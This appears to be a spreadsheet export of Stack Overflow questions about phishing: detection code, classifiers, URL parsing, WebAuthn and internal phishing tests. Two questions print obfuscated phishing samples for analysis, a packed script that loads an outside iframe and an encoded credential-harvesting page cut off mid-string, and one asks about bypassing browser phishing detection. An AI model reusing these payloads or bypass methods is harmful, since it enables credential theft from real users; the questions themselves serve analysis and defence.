 &lt;p&gt;someone tries to access my system,i just extracted some code blocks from there application. Please help me to analyse this code.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;powershell&gt;</t>
  </si>
  <si>
    <t>Understanding why attacxkers follow a specific strategy</t>
  </si>
  <si>
    <t>Why would a phishing website ask user to go through webauthn, instead it can plainly ask for username/password?</t>
  </si>
  <si>
    <t>&lt;p&gt;I understand that FIDO webauthn protocol is phishing proof, but why would a phishing website ask user to go through webauthn, instead it can plainly ask for username/password.&lt;/p&gt;
 &lt;p&gt;What im trying to imply is that FIDO is phishing proof for a service &lt;em&gt;only&lt;/em&gt; if it completely enables FIDO on all its authentication endpoints.
 If it has FIDO on few endpoints but has even one endpoint which is single factor , then you are still prone to phishing.
 My understanding is that when FIDO says its phishing proof, it means even if the attacker gets hold of your credentials, its useless as they still have to use FIDO key to access the account.
 And since a single factor endpoint exposes that, you are not phishing proof unless you completely to FIDO. Am I correct in my understanding?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webauthn&gt;&lt;fido-u2f&gt;&lt;fido&gt;</t>
  </si>
  <si>
    <t>How to breakdown this JavaScript phishing code?</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine was phished used a new technique by encoding html messages in the location bar. Decoding it I found this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&amp;lt;a?'':e(parseInt(c/a)))+((c=c%a)&amp;gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2.j="i h k l n";m{(g(){f 1=3.2.9(\'1\');1.8=\'7/x-4\';1.a=\'b 4\';1.c=\'\';2.p(\'B\')[0].C(1)}())}E(e){}3.2.z.y="&amp;lt;6 s=\\"r://q.t/u/w.v\\" o=\\"D: 0;A: 5%;d:5%\\"&amp;gt;&amp;lt;/6&amp;gt;";',41,41,'|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|rosettatranslation|http|src|top|ourclients|html|oreiwn||outerHTML|body|width|head|appendChild|border|catch'.split('|'),0,{}))
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I just need a breakdown of what this code does.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;html&gt;&lt;email&gt;&lt;xss&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phishing scanner program assistance</t>
  </si>
  <si>
    <t>&lt;p&gt;I have an assignment in my java class to make a very simple phishing scanner. The program needs to read a text file and then assign a point value to the listed words, then print out a summary of the word frequency and point values.&lt;/p&gt;
 &lt;p&gt;The end result would look something like this. The count value would change based on the frequency of the word.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/HidzN.jpg" alt="Results"&gt;&lt;/p&gt;
 &lt;p&gt;My issue is that while making a test string to check values and frequency it works fine. When I read from the text file and convert it into an array list then into an array it doesn't work the way it should. The testWords array has all the correct values but when I attempt to check it against the phishingWords array it doesn't register any of the words. I'm not entirely sure what is going wrong because it seems like it should work perfectly fine. If I could get an explanation or a solution to what is going wrong in the wordTest method it would be greatly appreciated.&lt;/p&gt;
 &lt;p&gt;Here is my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import java.io.BufferedReader;
 import java.io.FileReader;
 import java.util.ArrayList;
 import java.util.HashMap;
 public class PhishingScanner
 { 
 private static final int phishingWordsCount[] = new int [30];
 private static final String[] phishingWords = {
  "amazon", "official", "bank", "security", "urgent", "alert",
  "important", "information", "ebay", "password", "credit", "verify",
  "confirm", "account", "bill", "immediately", "address", "telephone",
  "ssn", "charity", "check", "secure", "personal", "confidential",
  "atm", "warning", "fraud", "citibank", "irs", "paypal" };
 private static final int phishingPoints[] = { 2, 2, 1, 1, 1, 1, 1, 2,
  3, 3, 3, 1, 1, 1, 1, 1, 2, 2, 3, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1 };
 //String used for testing the wordTest()
 //private static String[] testWords = {"thanks", "amazon", "paypal", "bank", "amazon"};
 public static void main(String[] args)
 {
  readFile();
  //used for testing the wordTest() not used in final application
  //wordTest(testWords);
 }
 public static void wordTest(String[] testWords)
 { 
  int total = 0;
  for(int j = 0; j &amp;lt; testWords.length; j++)
  { 
  for(int i = 0; i &amp;lt; phishingWords.length; i++)
  {
  if(testWords[j] == phishingWords[i])
  { 
  ++phishingWordsCount[i];
  total += phishingPoints[i];
  } 
  }
  }
  System.out.printf("%-15s%-10s%s\n","Word", "Count", "Points\n");
  for (int k = 0; k &amp;lt; phishingWords.length; k++)
  {
  System.out.printf("%-15s%-10s%s\n", phishingWords[k] , phishingWordsCount[k], phishingPoints[k]);
  }
  System.out.println("Total points: " + total);
 }
 private static void readFile() 
 {
  ArrayList&amp;lt;String&amp;gt; textFileWords = new ArrayList&amp;lt;String&amp;gt;();
  try
  {
  BufferedReader br = new BufferedReader(new FileReader("c:\\test.txt"));
  String str = "";
  String st;
  while ((st = br.readLine()) != null) 
  {
  str += st + " ";
  }
  HashMap&amp;lt;String, Integer&amp;gt; map = new HashMap&amp;lt;String, Integer&amp;gt;();
  str = str.toLowerCase();
  //^^ reads and converts the entire file into a single lowercase string
  int count = -1;
  for (int i = 0; i &amp;lt; str.length(); i++) 
  {
  if ((!Character.isLetter(str.charAt(i))) || (i + 1 == str.length())) 
  {
  if (i - count &amp;gt; 1) 
  {
  if (Character.isLetter(str.charAt(i))) 
  {
  i++;
  }
  String word = str.substring(count + 1, i);
  if (map.containsKey(word)) 
  {
  map.put(word, map.get(word) + 1);
  } 
  else 
  {
  map.put(word, 1); 
  } 
  textFileWords.add(word);
  //^^ Reads each word and puts it into the textFileWords Array List
  }
  count = i;
  }
  } 
  } 
  catch (Exception e)
  {
  System.out.println(e);
  } 
  String[] testWords = new String[textFileWords.size()];
  testWords = textFileWords.toArray(testWords);
  wordTest(testWords);
 }
 }
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;arrays&gt;&lt;methods&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Parse redirection URL</t>
  </si>
  <si>
    <t>&lt;p&gt;I analyze the URL in a malicious e-mail. I parse the e-mail using BeautifulSoup. I get this URL &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.google.com/url?q=http://my.%42%41%44%2e%43%4F&amp;amp;sa=D&amp;amp;usg=AFQjCNGTKogvWUF40RsyeAXrGi6uQrlhoQ" rel="nofollow noreferrer"&gt;https://www.google.com/url?q=http://my.%42%41%44%2e%43%4F&amp;amp;sa=D&amp;amp;usg=AFQjCNGTKogvWUF40RsyeAXrGi6uQrlhoQ&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This URL will force Google.com to redirect to &lt;a href="http://my.BAD.CO" rel="nofollow noreferrer"&gt;http://my.BAD.CO&lt;/a&gt; Given a URL like the one above how can I know that the URL will trigger redirect?&lt;/p&gt;
 &lt;p&gt;I want to get an indication that this is a redirect and I want to get two separate URLs
 &lt;a href="http://my.BAD.CO" rel="nofollow noreferrer"&gt;http://my.BAD.CO&lt;/a&gt; and &lt;a href="https://www.google.com/url?q=http://5sr0s.%61%6b%68%6f%72%61%62%2e%72%75&amp;amp;sa=D&amp;amp;usg=AFQjCNGTKogvWUF40RsyeAXrGi6uQrlhoQ" rel="nofollow noreferrer"&gt;https://www.google.com/url?q=http://5sr0s.%61%6b%68%6f%72%61%62%2e%72%75&amp;amp;sa=D&amp;amp;usg=AFQjCNGTKogvWUF40RsyeAXrGi6uQrlhoQ&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;where &lt;a href="http://my.BAD.CO" rel="nofollow noreferrer"&gt;http://my.BAD.CO&lt;/a&gt; is an encoded target URL &lt;a href="http://my.%42%41%44%2e%43%4F" rel="nofollow noreferrer"&gt;http://my.%42%41%44%2e%43%4F&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;If the only solution is a custom RegEx like this &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;(?i)(http|https)://(www.|)google.com/url\?q=(http|https)://(\S+)\&amp;amp;usg=\S+
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;followed by a call to &lt;em&gt;urllib.parse.unquote&lt;/em&gt; will it cover all corner cases?
 Are there other ways to redirect besides &lt;a href="https://www.google.com/url" rel="nofollow noreferrer"&gt;https://www.google.com/url&lt;/a&gt;... ?&lt;/p&gt;
 &lt;p&gt;I found another way to redirect Here is another way to redirect: via &lt;a href="https://www.google.de/url?sa=t&amp;amp;url=" rel="nofollow noreferrer"&gt;https://www.google.de/url?sa=t&amp;amp;url=&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;regex&gt;&lt;python-3.x&gt;&lt;url&gt;&lt;beautifulsoup&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Testing an attack</t>
  </si>
  <si>
    <t>Why phishing on local host is not detected</t>
  </si>
  <si>
    <t>Phishing page not detect in localhost</t>
  </si>
  <si>
    <t>&lt;p&gt;Why chrome/firefox not detect localhost phishing?
 I'd like to test the bypass, but localhost does not display a phishing script. 
 How do I fix this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;localhost&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>testing for a phishing campaign</t>
  </si>
  <si>
    <t>How to assign value to attributes for a string for classification?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to implement a system that can detect phishing websites. The input will consist of the website URL, taken through a web page. I am using the UCI Phishing Data set (which has around 30 attributes) and I am training and testing the J48 Classification Model to predict future instances. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Attributes&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@relation phishing
 @attribute having_IP_Address { -1,1 }
 @attribute URL_Length { 1,0,-1 }
 @attribute Shortining_Service { 1,-1 }
 @attribute having_At_Symbol { 1,-1 }
 @attribute double_slash_redirecting { -1,1 }
 @attribute Prefix_Suffix { -1,1 }
 @attribute having_Sub_Domain { -1,0,1 }
 @attribute SSLfinal_State { -1,1,0 }
 @attribute Domain_registeration_length { -1,1 }
 @attribute Favicon { 1,-1 }
 @attribute port { 1,-1 }
 @attribute HTTPS_token { -1,1 }
 @attribute Request_URL { 1,-1 }
 @attribute URL_of_Anchor { -1,0,1 }
 @attribute Links_in_tags { 1,-1,0 }
 @attribute SFH { -1,1,0 }
 @attribute Submitting_to_email { -1,1 }
 @attribute Abnormal_URL { -1,1 }
 @attribute Redirect { 0,1 }
 @attribute on_mouseover { 1,-1 }
 @attribute RightClick { 1,-1 }
 @attribute popUpWidnow { 1,-1 }
 @attribute Iframe { 1,-1 }
 @attribute age_of_domain { -1,1 }
 @attribute DNSRecord { -1,1 }
 @attribute web_traffic { -1,0,1 }
 @attribute Page_Rank { -1,1 }
 @attribute Google_Index { 1,-1 }
 @attribute Links_pointing_to_page { 1,0,-1 }
 @attribute Statistical_report { -1,1 }
 @attribute Result { -1,1 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;package weka1;
 import java.io.BufferedReader;
 import java.io.BufferedWriter;
 import java.io.FileReader;
 import java.io.FileWriter;
 import java.util.Random;
 import weka.classifiers.Evaluation;
 import weka.classifiers.trees.J48;
 import weka.core.Instances;
 public class file1 {
  public static void main(String[] args) throws Exception
  {
  BufferedReader breader= null;
  breader=new BufferedReader( new FileReader("C:\\Users\\.Gayatjhri\\Desktop\\phishing_training.arff"));
  Instances train1= new Instances(breader);
  train1.setClassIndex(30);
  breader=new BufferedReader( new FileReader("C:\\Users\\.Gayatjhri\\Desktop\\phishing_test.arff"));
  Instances test= new Instances(breader);
  test.setClassIndex(30);
  breader.close();
  J48 tree=new J48();
  tree.buildClassifier(train1);
  Instances labeled= new Instances(test);
  Evaluation eval= new Evaluation(train1);
  eval.crossValidateModel(tree, train1, 10, new Random(1));
  System.out.println(eval.toSummaryString("Results\n==========================================\n", true));
  System.out.println(eval.fMeasure(1)+ ""+ eval.precision(1)+ ""+ eval.recall(1));
  for(int i=0; i&amp;lt;test.numInstances(); i++){
  double clsLabel= tree.classifyInstance(test.instance(i));
  labeled.instance(i).setClassValue(clsLabel); 
  }
  BufferedWriter writer=new BufferedWriter(
  new FileWriter("C:\\Users\\.Gayatjhri\\Desktop\\phishing_labeledd.arff"));
  writer.write(labeled.toString());
  writer.close(); 
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;}&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;How can I assign values to these 30 attributes for any given URL ?&lt;/strong&gt; &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;dataset&gt;&lt;classification&gt;&lt;weka&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to defend against TabNabbing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got very concerned reading &lt;a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/" rel="nofollow noreferrer"&gt;this genius post by Aza Raskin&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;What are the non-browsers solutions to defend against TabNabbing? Are there any?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;browser&gt;&lt;encryption&gt;&lt;cryptography&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is it safe to accept url from user to show in our website?</t>
  </si>
  <si>
    <t>&lt;p&gt;I wanna show users websites in their profiles but I don't know after I validate the user's input format to be the valid URL (&lt;a href="https://userwebsite.com" rel="nofollow noreferrer"&gt;https://userwebsite.com&lt;/a&gt;), is it safe to use that input in a tag (&lt;code&gt;&amp;lt;a href=&amp;quot;https://userwebsite.com&amp;quot;&amp;gt;&lt;/code&gt;) to redirect other users to that website? if it's not safe is there any way to check the URL??&lt;/p&gt;
 &lt;p&gt;how facebook and others handle this situation like example below&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.facebook.com/pages/Restaurant-El-Reda-libanesische-und-iranische-Spezialit%C3%A4ten/169985763015422" rel="nofollow noreferrer"&gt;https://www.facebook.com/pages/Restaurant-El-Reda-libanesische-und-iranische-Spezialit%C3%A4ten/169985763015422&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Decoding Google safe browsing v3 protocol buffers</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to decode the protocol buffers returned from Google's Safe Browsing API.&lt;/p&gt;
 &lt;p&gt;I am using C#, but a Java solution would work also as it would be more or less the same.&lt;/p&gt;
 &lt;p&gt;My current incomplete code is like this&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; public void Download()
  {
  var lists = new List&amp;lt;string&amp;gt;
  {
  "goog-malware-shavar",
  "goog-unwanted-shavar",
  "googpub-phish-shavar"
  };
  var protocol = "https://";
  var uriBase = $"safebrowsing.google.com/safebrowsing/downloads?client=api&amp;amp;key={_googleSafeBrowsingApiKey}&amp;amp;appver=1.5.2&amp;amp;pver=3.0";
  var requestUrl = protocol + uriBase;
  var content = new StringContent("googpub-phish-shavar;\ngoog-malware-shavar;\ngoog-unwanted-shavar;\n");
  using (var client = new HttpClient())
  {
  var httpResult = client.PostAsync(requestUrl, content).Result;
  var result = httpResult.Content.ReadAsStringAsync().Result;
  var lines = result.Split('\n');
  var firstUrl = lines[2].Substring(2);
  var newRes = client.GetAsync("https://" + firstUrl).Result.Content.ReadAsByteArrayAsync().Result;
  var len = BitConverter.ToUInt32(newRes, 0);
  var newArray = newRes.Skip(3).Take((int)len).ToArray();
  try
  {
  ChunkData chunk =
  ChunkData.Parser.ParseFrom(newArray);
  if (chunk == null)
  {
  }
  }
  catch
  {
  }
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I am not really sure what to pass to ChunkData.Parser.ParseFrom&lt;/p&gt;
 &lt;p&gt;According to the documentation the result is supposed to start with an unsigned 32-bit integer, so that why I used var len = BitConverter.ToUInt32(newRes, 0), to try and get this number. I thought this should be the number of bytes in the chunk, but this number is much larger than the whole byte array.&lt;/p&gt;
 &lt;p&gt;How can I get the correct pieces of the byte array to the ChunkData parser?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;google-api&gt;&lt;protocol-buffers&gt;&lt;safe-browsing&gt;&lt;protobuf-csharp-port&gt;</t>
  </si>
  <si>
    <t>wifiphisher traceback. error after entering the number of AP</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently, I used the wifi phisher tool in Kali Linux. when I enter the number of AP in the list, I get the following trace in the terminal:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File "wifiphisher.py", line 743, in &amp;lt;module&amp;gt;
  dhcp(dhcpconf, ap_iface)
  File "wifiphisher.py", line 407, in dhcp
  Popen(['ifconfig', mon_iface, 'mtu', '1400'], stdout=DN, stderr=DN)
  File "/usr/lib/python2.7/subprocess.py", line 679, in __init__
  errread, errwrite)
  File "/usr/lib/python2.7/subprocess.py", line 1259, in _execute_child
  raise child_exception
 TypeError: execv() arg 2 must contain only strings
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Any suggestions on this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;linux&gt;&lt;exception&gt;&lt;terminal&gt;&lt;wifi&gt;</t>
  </si>
  <si>
    <t>Automatically download images in Outlook based upon the mail server</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently doing internal phishing campaigns within my company and I am trying to improve the process. One of the issues is that if I include tracking pixels to allow tracking whether an email has been opened or not the image will invariably get blocked by outlook and require the user to manually download it "Click here to download pictures. To help protect your privacy, Outlook prevented automatic download of some pictures in this message,"&lt;/p&gt;
 &lt;p&gt;Now, I can get around this by adding the spoofed email address in to the safe senders list, but this then means that I have to do this for each campaign and have to then push it out via GPO to everyone. Does anybody know of a way that the mail server can be whitelisted so that any email received from say 10.10.150.200 will have its images automatically downloaded?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;image&gt;&lt;email&gt;&lt;outlook&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Gmail API: Recipient of the email will see red warning about the safety of the email</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a problem with all emails sent via our Gmail API App.
 All of them deliver with a warning about the safety of the email&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;This message seems dangerous. Many people marked similar messages as phishing scams, so this might contain unsafe content. Avoid clicking links, downloading attachments, or replying with personal information.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/H4Q5b.png" alt="Screenshot of the warning message" /&gt;&lt;/p&gt;
 &lt;p&gt;This happens only when sending an email through our &lt;code&gt;Gmail API&lt;/code&gt; but when sent via &lt;code&gt;SMTP&lt;/code&gt; will deliver the message without any warning.&lt;/p&gt;
 &lt;p&gt;This warning message appears on all emails sent via our Gmail API Application, no matter if the sender is a Google workspace user or a free Gmail user.&lt;/p&gt;
 &lt;p&gt;Can anyone help on this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;gmail-api&gt;</t>
  </si>
  <si>
    <t>Is it possible that InBox Actions are being used to phish Amazon customers?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've just encountered some weird behavior in Gmail that looks like some new kind of phishing attack. I got a couple shipment confirmations from Amazon today and there are these "Track Package" buttons (also I see "View Order" buttons on order confirmations) but when I click on them the page that gets opened is clearly not the correct shipper's web site.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://dl.dropboxusercontent.com/u/73840666/%22track%20package%22%20buttons.png" alt="grab of inbox showing buttons in subjects"&gt;&lt;/p&gt;
 &lt;p&gt;Which looks fine but clicking on those buttons lead to bad pages. For example one of them goes to &lt;a href="http://websro.correios.com.br/sro_bin/txect01%24.QueryList?P_LINGUA=001&amp;amp;P_TIPO=002&amp;amp;P_COD_LIS=1ZE127620301872728:1ZE127620301872728" rel="nofollow"&gt;http://websro.correios.com.br&lt;/a&gt;. On the other it goes to USPS.com while the actual shipper (and correct link in the email body) goes to UPS.com.&lt;/p&gt;
 &lt;p&gt;I've looked at the source of the email and it all looks fine. There are no SCRIPT tags of any kind and no bogus links anywhere in the text (by which I also mean the HTML). The problem appears the same in Safari (6.1.1) and Chrome (31.0.1650.63). It looks normal in Mail (both Mountain Lion and iOS 5).&lt;/p&gt;
 &lt;p&gt;I couldn't figure out how such a button could get there and I found this feature for adding "registered" script actions to Gmail which is the only thing I can imagine would affect both Safari and Chrome.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;gmail&gt;&lt;phishing&gt;&lt;google-schemas&gt;</t>
  </si>
  <si>
    <t>How can opening an HTML file compromise personal information / bank account details / etc?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just received an email from someone I know quite well that was clearly a scam. It's from their gmail account so I assume that somewhere along the lines their password was compromised.&lt;/p&gt;
 &lt;p&gt;The email asked me to open an HTML attachment, which not surprisingly was just JavaScript. I've copied the whole email below (though I replaced tabs with spaces in to make it display better, so the encoding (if that's what it is) may be broken for the param passed to the &lt;code&gt;hJKm&lt;/code&gt; function). I printed the result of the &lt;code&gt;document.write(source)&lt;/code&gt; code from the original attachment below for info.&lt;/p&gt;
 &lt;p&gt;Looking at the resultant web page, I get prompted to enter my receiving email address and password - so I guess it's an attempt at gathering gmail addresses and passwords. This is much less aggressive than I initially thought. But the question is:&lt;/p&gt;
 &lt;p&gt;Is their ever a reason to worry about just opening an HTML file? I understand that browsers have a variety of ways of storing data, but that supposedly these are safe for major websites such as Facebook/Gmail/etc. (I guess the thing I should be worried about is a CORS attack?)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;The source code of the attachment&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;! This message MUST stay in place !&amp;gt;
 &amp;lt;! Created With HTML Code Guard v2.1 !&amp;gt;
 &amp;lt;! Get your copy at http://www.adobe.com&amp;gt;
 &amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;SCRIPT LANGUAGE='JavaScript'&amp;gt;
 var key = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1029384756&amp;gt;&amp;lt;#].:/";
 function hJKm(_message) {
  var bTG;
  var rcH = key.length/2;
  var _newString = "";
  var lk;
  for (var x = 0; x &amp;lt; _message.length; x++) {
  bTG = key.indexOf(_message.charAt(x));
  if (bTG &amp;gt; rcH) {
  lk = bTG - rcH; _newString += key.charAt(34 - lk);
  } else {
  if (key.indexOf(_message.charAt(x)) &amp;lt; 0) {
  _newString += _message.charAt(x);
  } else {
  lk = rcH - bTG; _newString += key.charAt(34 + lk);
  }
  }
  }
  return (_newString);
 }
 source=hJKm(" c!6t&amp;lt;ojs7 0ovwDc0ovw z6=\"i:Qxzu\" &amp;lt;w:pp=\"mH_H vzu27z90o \"D c07:6D cozow7D&amp;gt;qts]tk w 2tv7cAozow7D cv7o: 0oos-7rnzm=\"L-O/-#tvs:oz]w7\" &amp;lt;tuo7uo=\"15=5697\"D cv7o: u:v7=\"mz7lstqo\" &amp;lt;tuo7uo=\"lz6o0=67mz&amp;lt;7-lz6o0, zuzoz:w-p&amp;lt;:w7=IBh, v:kzvnv-p&amp;lt;:w7=IBh, np7q-p&amp;lt;:w:]w7=ut\" ADcv7o: u:v7=\"2:u607w64qz7u6wj\" &amp;lt;tuo7uo=\"oqn7\" AD cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHA&amp;lt;ppA8tuoA8tuoB&amp;lt;pp?m=IFgGhFeHdHhhh\"D cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHA&amp;lt;ppAv:zu_WWB&amp;lt;pp?m=IFgGhFeHdHhhh\"Dcwzux q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA&amp;lt;GBvzuB&amp;lt;pp\"Dcwzux q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHA&amp;lt;ppAwz]pAyrn7qj-nzBvzuB&amp;lt;pp\"Dcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qjByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAl:jstzuopByp\"DcAp&amp;lt;qzsoD cp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAs:q:ww:kByp\"DcAp&amp;lt;qzsoD cp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pApwz&amp;lt;xBvzuByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA6GByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA9:n97Byp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA&amp;lt;GBvzuByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qj-nzBvzuByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAyrn7qjBp&amp;lt;qtwwz8jBvzuByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAv:zu_WWByp?m=IFgGhFeHdHhhh\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypA8tqvN:wz6:oztuByp?m=IFgGhFeHdHhhh\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA/uzv:o7Byp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAQ&amp;lt;qtww7qByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pAq7u67qByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAwz]pA5:pjQ&amp;lt;qtww7qByp\"DcAp&amp;lt;qzsoDcp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypA.:p7dFByp?m=IFgGhFeHdHhhh\"DcAp&amp;lt;qzsoD cwzux q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHA&amp;lt;ppAv:zu_]qtlp7qT#B&amp;lt;pp?m=IFgGhFeHdHhhh\"0oospaAAlllB8u]B&amp;lt;tBi:AD cp&amp;lt;qzso ojs7=\"o7koAy:m:p&amp;lt;qzso\" pq&amp;lt;=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHAypAv:zu_WW_s&amp;lt;Byp?m=IFgGhFeHdHhhh\"DcAp&amp;lt;qzsoD cwzux 